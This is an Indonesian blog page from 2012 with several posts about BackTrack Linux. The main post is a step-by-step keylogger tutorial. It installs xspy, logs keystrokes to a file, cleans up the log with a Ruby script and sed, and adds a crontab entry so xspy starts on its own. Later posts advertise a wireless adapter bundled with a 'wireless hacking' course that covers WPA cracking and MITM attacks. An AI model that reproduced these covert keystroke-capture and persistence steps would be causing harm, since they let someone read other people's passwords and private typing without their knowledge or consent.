Saturday, April 28, 2012

Keylogger di linux menggunakan xspy

sumber gambar wikipedia.org
Kebetulan browsing-browsing dan menemukan tutorial kelogger di sistem operasi linux menggunakan xspy, saya sih pernah dengar untuk xspy sendiri, akan tetapi belum ada waktu saja untuk mengexplorernya lebih dalam, sekarang kita akan mencoba untuk menggunakan xspy yang sudah include di dalam backtrack 5 R2. Kalau disitus christian yang memposting tulisan ini hanya proses menggunakannya, saya menambahkan cara menggunakan crontab agar dapat berjalan sendiri saat komputer dihidupkan.

1. Installasi xspy (bagi distro selain backtrack)

ubuntu@octopurba:~$ sudo su
ubuntu@octopurba:~# nano /etc/apt/sources.list <-- edit file source.list
deb http://archive.offensive-security.com pwnsauce main microverse macroverse restricted universe multiverse
    
ubuntu@octopurba:~# apt-get update <-- update
ubuntu@octopurba:~# aptitude search xspy <-- cek ketersedian xspy
ubuntu@octopurba:~# apt-get install xspy <-- install xspy

2. Cara menggunakan xspy

root@bt:/pentest/sniffers/xspy# touch log.txt <-- buat file log.txt
root@bt:/pentest/sniffers/xspy# ./xspy >> log.txt <-- masukan hasil dari xspy ke log.txt
root@bt:~# tail -f /pentest/sniffers/xspy/log.txt <-- untuk melihat hasil dari log.txt

3. Merubah tampilan hasil agar lebih gampang dibaca menggunakan script ruby dari blog cristhian juga yang gunanya menfilter tampilan yang muncul seperti ^A , ^C) , ^D , ^T , ^X, dll.

copy paste script dibawah memudian simmpan dengan nama filtertampilan.rb atau dengan nama yang lain(sesuai selera), jalankan dan lihat hasilnya.

#!/usr/bin/env ruby1.8
#funny and little evil i know
#have fun..
log_=Array.new
filter_=['(\([^()]*)\)|(\^A)|(\^C)|(\^D)|(\^T)|(\^X)|(\^F)|(\^S)(\^V)|(\^Z)|(\^N)|(\^U)']
letsopen_=File.open('/pentest/sniffers/xspy/log.txt','r').each do |line|
    log_.push(line.gsub(/#{filter_}/, ""))
end
puts log_

atau bisa memakai command regular expression yang menggunakan command sed

root@bt:~# sed -e 's/([^()]*)/ /g' /pentest/sniffers/xspy/log.txt

4. Membuat crontab agar xspy dapat dijalankan otomatis pada komputer dijam-jam tertentu

a. buat xspy agar gampang dieksekusi

root@bt:~# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# cp xspy /bin/xspy <-- copy xspy ke /bin/xspy
root@bt:/pentest/sniffers/xspy# chmod +x /bin/xspy <-- eksekusi xspy
root@bt:/pentest/sniffers/xspy# xspy 

b. Integrasi xspy dan crontab

root@bt:~# crontab -e

kemudian masukan perintah

36 20 * * * xspy >> /pentest/sniffers/xspy/log.txt


yang artinya perintah akan dieksekusi setiap jam 8:36 malam hari (rubah sesuai selera)

1. (* pertama) : menit (isian : 0 – 59)
2. (* kedua) : jam (isian : 0 – 23)
3. (* ketiga) : hari dari bulan / tanggal (isian : 1 – 31)
4. (* keempat) : bulan (isian : 1 – 12)
5. (* kelima) : hari dari minggu (isian : 0 – 6) –> 0 = minggu


Semoga tutorial ini bisa bermanfaat bagi newbie-newbie seperti saya dan teman-teman,:)

Wednesday, April 11, 2012

Perbedaan BackTrack GNOME dan KDE

Gambar dari linuxuser.co.uk
Banyak pengguna BackTrack binggung saat memutuskan untuk menggunakan BackTrack dengan DE GNOME atau KDE. Sampai kemarin ada yang langsung mengirimkan pesan singkat melalui ponsel untuk hanya menanyakan apa sih bedanya BackTrack GNOME dan KDE. Semoga tulisan ini bisa membuat cara pandang kita pada perbedaan keduanya.

Apa perbedaan diantara keduanya ?

Perbedaannya hanya terletak pada DE atau Desktop Environment yaitu GNOME dan KDE. sebenarnya sih masih banyak DE yang lain diluar sana, tetapi karena pengguna dan dukungan komunitas yang banyak sehingga GNOME dan KDE lebih populer.

Kelebihan dan kekurangnya ?

Kalau berbicara bagus yang mana, masing-masing DE memiliki kelebihan dan kekurangan tentunya.

GNOME memiliki kelebihan lebih ringan dan pemakaian memory yang tidak terlalu banyak. Kekurangannya adalah tidak terlalu friendly dibanding KDE dan menaruh perhatian besar pada tampilan walaupun juga tidak mengabaikannya sama sekali.

KDE memiliki kelebihan pada grafis yang menggikuti standar antarmuka yang ramah dan efisien bagi penggunanya, sehingga tidak salah kalau tampilan KDE lebih menarik dibandingkan dengan GNOME, dan KDE juga didesign sedemikian rupa sehingga pengoperasiannya semudah mengoperasikan desktop pada lingkungan Windows maupun MacOS. Tetapi kekurangannya adalah karena berorientasi pada grafis dan kemudahan pemakaian memory yang besar tidak dapat dihindarkan.

Untuk yang baru belajar lebih bagus pakai yang mana?

Saya tidak membatasi harus memakai BackTrack versi GNOME atau KDE yang pasti menggunakan versi apapun kita tetap bisa menggunakannya, toh yang kita cari bukan tampilannya tapi aplikasi-aplikasi yang ada didalamnya. Untuk tampilan kita masih bisa mengakalinya dengan menambahkan efek-efek tertentu.

Lebih stabil mana GNOME atau KDE?


Stabil itu kan melihat banyak faktor, misalnya kecepatan, manajemen memory, pemaksimalan prosesor, crash system, dan masih banyak lagi, oleh karena seperti tadi saya tuliskan bahwa dukungan komunitas yang banyak pada kedua DE ini meminimaliskan ketidak stabilan.


Untuk aplikasi apakah ada perbedaan ?

karena berasal dari source dan developer yang sama, tentu aplikasi-aplikasi didalamnya tidak ada perbedaan, jadi jangan takut pada perbedaan aplikasi dari 2 versi tersebut.

Mungkin baru itu saja yang bisa saya jelaskan tentang perbedaan BackTrack versi GNOME dan KDE menurut sepengatahuan saya, mungkin kalau ada pertanyaan nanti post ini akan saya update lagi. Terima Kasih,:)

Perbaiki error saat menambahkan repository backtrack diubuntu

Gambar dari thecomputeradvisor.net
Seperti yang kita ketahui bahwa keunggulan linux adalah manajemen paket dari sebuah distro yang bisa digunakan atau ditambahkan pada distro lain, membuat kita menjadi lebih dimudahkan, contohnya saya sedang menggunakan Distro Ubuntu tetapi saya juga ingin menggunakan Distro BackTrack, tetapi kalau saya mengginstall keduanya menjadi dual boot, tentu saja sangat merepotkan, untungnya saya bisa menambahkan aplikasi-aplikasi yang ada pada BackTrack didalam ubuntu saya.

Sehingga walaupun tanpa mengginstall BackTrack saya bisa menggunakan aplikasi-aplikasinya, hal itu disebut dengan Menambahkan repository BackTrack diUbuntu. Tetapi biasanya ada permasalahan yang muncul yaitu ketika apt cache kelebihan kapasitas, Untuk memperbaikinya adalah seperti berikut :

1. Buka file /etc/apt/apt.conf atau file /etc/apt/apt.conf.d/70debconf
2. Kemudian tambahkan perintah berikut pada line terakhir.

APT::Cache-Limit "10000000"; 

angka 10000000 sama dengan 10m, sahabat bisa mengatur jumlahnya sesuai kebutuhan.

3. Untuk membersihkan drive kita dari cache sebelumnya gunakan perintah

apt-get clean 

sumber : www.ithowto.ro

Tuesday, April 3, 2012

Jual ALFA AWUS036H + BackTrack + Tutorial Murah!

Kabar Gembira buat sahabat yang ingin atau belum berhasil melakukan Hacking [tidak support] pada wireless, seperti cracking password WPE, WPA, WPA, Fake AP, dan masih banyak lagi, Gilakomputer.net hadir kembali menawarkan paket Wireless Hacking dengan Harga yang pasti murah, menggunakan Wireless adapter ALFA AWUS036H yang sudah pasti support [cek disini] dan banyak dipakai untuk melakukan Hacking terhadap sistem keamanan Wireless.

Kegembiraan itu lebih lengkap lagi dengan adanya BONUS disetiap pembelian ALFA AWUS036H yang sahabat bisa dapatkan dengan cuma-cuma alias Gratis yaitu :

1 DVD Backtrack Terbaru
1 DVD Tutorial Wireless Hacking Terbaru [menggunakan ALFA AWUS036H] [ukuran 4.4 GB]




Untuk semua yang diatas sahabat cukup membayar dengan harga Rp. 395.000 [belum termasuk ongkos kirim].

Spesifikasi ALFA AWUS036H :


Model
AWUS036H

Standards
Wireless: IEEE 802.11b/g

USB 2.0 standard

Data Rate
802.11b: UP to 11Mbps


802.11g: 54Mbps

OS Supported
Windows 98SE, Windows ME, Windows 2000, Windows XP, Linux 2.6, Mac 10.4

Interface
USB 2.0 mini USB

Antenna Type
1 x 2.4Ghz SMA connector

Chipset
Realtek 8187L

One LED
Power/Status, Wireless Act.

Frequency Range
2412~2462 MHz (N.A)

2412~2472 MHz (EU)


2412~2484 MHz (Japan)

Channel
1~11 channels ( North America )

1~13 channels ( General Europe)

1~14 channels (Japan)


Emission Type
DSSS/OFDM

Output Power
24dBm (OFDM), 30dBm(CCK)

Sensitivity


802.11b
1, 2 Mbps (BPSK, QPSK): – 96dBm

11 Mbps (CCK): -91dBm

(Typically @PER < 8% packet size 1024 and @25ºC + 5ºC)

Sensitivity

802.11g
54Mpbs (64QAM): -71dbm

48Mbps (64QAM): -76dbm

36Mpbs (16QAM): -78dbm

24Mbps (16QAM): -80dbm

18Mbps (QPSK): -81dbm


12Mpbs (QPSK): -82dbm

9Mbps (BPSK): -85dbm

6Mbps (BPSK): -91dbm

(typically @PER < 10% packet size 1024 and @25ºC + 5ºC)

Frequency Stability
within +25 ppm

Data Modulation Type
BPSK,QPSK, CCK and OFDM

Power
Voltage: 5V+5%

Security
WEP 64/128

802.1X support

Wi-Fi Protected Access (WPA)

WPA-PSK

WPA II

Operating Temp
0°C ~ +50°C

Storage
-10°C ~ +65°C


Humidity
5%~98% non-condensing

Dimention
8.5*2.2*6.3cm

Weight

38.5g


DVD Tutorial Wireless Hacking :
Video yang membahas tentang dasar-dasar Wireless sampai dengan penetrasi menggunakan tehnik sniffing, injeksi, cracking, dan masih banyak lagi tehnik serangan terhadap wireless.

- Getting Started
- Bands, Channels and Sniffing
- Pwning Beacon Frames
- Dissecting AP-Client Connections
- Dissecting WLAN Headers
- Pwning Hidden SSIDs
- Laughing Off MAC Filters
- Hacking WLAN Authentication
- Hotspot Attacks
- Hacking Isolated Clients
- Alfa Card Kung-Fu [ ALFA AWUS036H ]
- Man-in-the-Middle Attack
- SSL MITM Attack Over Wireless
- SSL MITM Attack Over Wireless Demo
- SSL Man-in-the-Middle Attacks
- Custom Wireless Regulation Database
- WEP In-Depth
- WEP Cracking
- Caffe Latte Attack Basics
- Caffe Latte Attack Demo
- Caffe Latte Attack on the iPhone
- KoreK's ChopChop Attack
- Fragmentation and Hirte Attack
- Understanding WPA/WPA2
- Wi-Fi Challenge 1 (Level Easy) : There is no Patch for Stupidity!
- Wi-Fi Challenge 1 Solution : There is no Patch for Stupidity!
- Wi-Fi Challenge 2 (Level - Intermediate) : Know Thy Packets
- Wi-Fi Challenge 2 Solution : Know Thy Packets
- Wi-Fi Challenge 3 (Level Advanced): Never Underestimate your Enemy!
- WPA-PSK
- WPA-PSK Cracking
- WPA2-PSK Cracking
- Speeding up WPA/WPA2 PSK Cracking
- Never Underestimate Your Enemy!
- Mood Swings of a Wandering Client
- Cracking WPA/WPA2-PSK with just the Client
- Questions and Answers
- Wpa_Supplicant
- Crack WPA-Personal with only AP
- Setting up FreeRadius-WPE on Backtrack
- EAP-MD5 Basics and Demo
- Cracking EAP-MD5 with Eapmd5pass and Eapmd5crack
- EAP Types and PEAP Demo
- Cracking PEAP
- Cracking PEAP in a Windows Network
- Cracking EAP-TTLS
- Insecurity in 3rd Party Wi-Fi Utilities
- Conclusion and the Road Ahead
- Windows Wireless Kung-Fu (SWSE Addendum 1)
- Creating Wireless Backdoors (SWSE Addendum 2)
- Malware, Metasploit and the Hosted Network (SWSE Addendum 3)
- SecurityTube Certified Wi-Fi Security Expert (SWSE) Student Portal Launch

BERMINAT SILAHKAN MEMESAN :

Email : gilakomputer@gmail.com
Telp : 087821491894
facebook : octopurba
twitter : @octopurba
yahoo : kodokpink
website : www.gilakomputer.net
UNTUK BANDUNG BISA COD SEKALIAN KENALAN,:)


CARA PEMBAYARAN :

1. Kirim pesan melalui email, sms, facebook, twitter kepada alamat yang diatas dengan format sebagai berikut : NAMA#PESANAN#ALAMAT mis : Octopurba#ALFA Wireless Hacking#jln. kolonel msturi no 288 parompong bandung

2. Setelah mendapat balasan, Lakukan pembayaran dengan mentransfer unag pada rekening sesuai balasan dari saya.
3. Setelah pembayaran diterima barang akan langsung dikirimkan, jika pembayaran dilakukan pada lebih dari jam 1 sore, maka pengiriman akan dilakukan keesokan harinya.


PERATURAN :

1. Penggiriman menggunakan Jasa JNE dan TIKI.

2. Agar tidak mengecewakan sahabat, saya selalu melakukan cek ulang kepada setiap DVD yang saya kirimkan, dan apa bila terjadi kerusakan seperti corrupt, file tidak terbaca, kerusakan selain pada fisik DVD, maka saya wajib mengganti dengan tambahan 1 DVD BackTrack baru untuk versi yang berbeda dan ongkos kirim ditanggung sahabat.

3. Jika terjadi kerusakan pada fisik maka sahabat langsung berurusan dengan pihak pengiriman barang.

4. Pengiriman barang hanya dilakukan pada hari senin - jum'at, jika pemesanan dilakukan terakhir pada hari jum'at maka barang akan dikirimkan pada hari senin.

5. Peraturan bisa berubah menyesuaikan dengan masalah yang terjadi.


Jadi tunggu apalagi, segera pesan sekarang,:)

Sunday, April 1, 2012

Layanan baru Offensive-Security untuk BackTrack

Gambar dari situs resmi.
Offensive-Security sebagai developer resmi distro sekuriti komputer paling populer saat ini, yaitu BackTrack Linux, baru saja mengumumkan layanan baru yang sifatnya memungkinkan perusahaan, organisasi dan orang biasa bisa menyesuaikan BackTrack mereka dengan beberapa pilihan sesuai dengan kebutuhan atau pesanan, contohnya saya ingin Distro BackTrack yang didalamnya hanya ada paket untuk Exploitasi dan wallpapernya terdapat logo perusahaan milik saya.

Layanan baru ini dapat diakses tapi dengan membayar sejumlah kecil biaya (tergantung pada jumlah ISO yang dihasilkan) untuk menyesuaikan distribusi paket, driver, memperbarui distribusi pribadi kita ke versi terbaru (bahkan sebelum dirilis) dan menambahkan paket, yang biasanya tidak didapatkan pada versi BackTrack umum yang kita download dari situs resminya, berikut adalah video dari layanan tersebut :



Untuk biaya, layanan Standart dikenakan biaya sekitar USD 13,000, dan layanan Premium dengan biaya sekitar USD 25,000. Jadi apakah sahabat ingin menggunakan layanan ini?

Situs resmi layanan : https://www.backtrack-linux.com

 
biz.